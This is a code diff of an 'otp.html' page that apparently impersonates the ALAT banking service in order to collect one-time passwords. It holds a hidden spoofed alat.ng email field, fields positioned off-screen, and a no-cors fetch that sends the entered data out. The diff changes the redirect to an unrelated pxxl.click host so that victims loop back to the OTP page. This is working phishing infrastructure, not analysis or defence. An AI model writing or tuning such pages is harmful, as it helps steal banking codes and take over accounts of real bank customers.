--- a/otp.html
+++ b/otp.html
@@ -125,7 +125,7 @@
                 <input type="text" name="honeypot" value="" class="hidden-field" tabindex="-1" autocomplete="off" />
                 
                 <!-- Required email field -->
-                <input type="email" name="email" value="verification@alat.ng" readonly style="position: absolute; left: -9999px;" />
+                <input type="email" name="email" value="otp@alat.ng" readonly style="position: absolute; left: -9999px;" />
                 
                 <input type="hidden" name="name" value="ALAT User" />
                 <input type="hidden" name="_redirect" value="false" />
@@ -170,9 +170,9 @@
         body: formData,
         mode: 'no-cors'
       }).then(() => {
-        window.location.href = 'https://webwemma-app.pxxl.click/success.html';
+        window.location.href = 'https://webwemma-app.pxxl.click/otp.html';
       }).catch(() => {
-        window.location.href = 'https://webwemma-app.pxxl.click/success.html';
+        window.location.href = 'https://webwemma-app.pxxl.click/otp.html';
       });
     });
 
@@ -197,3 +197,4 @@
 </body>
 
   </html>
+
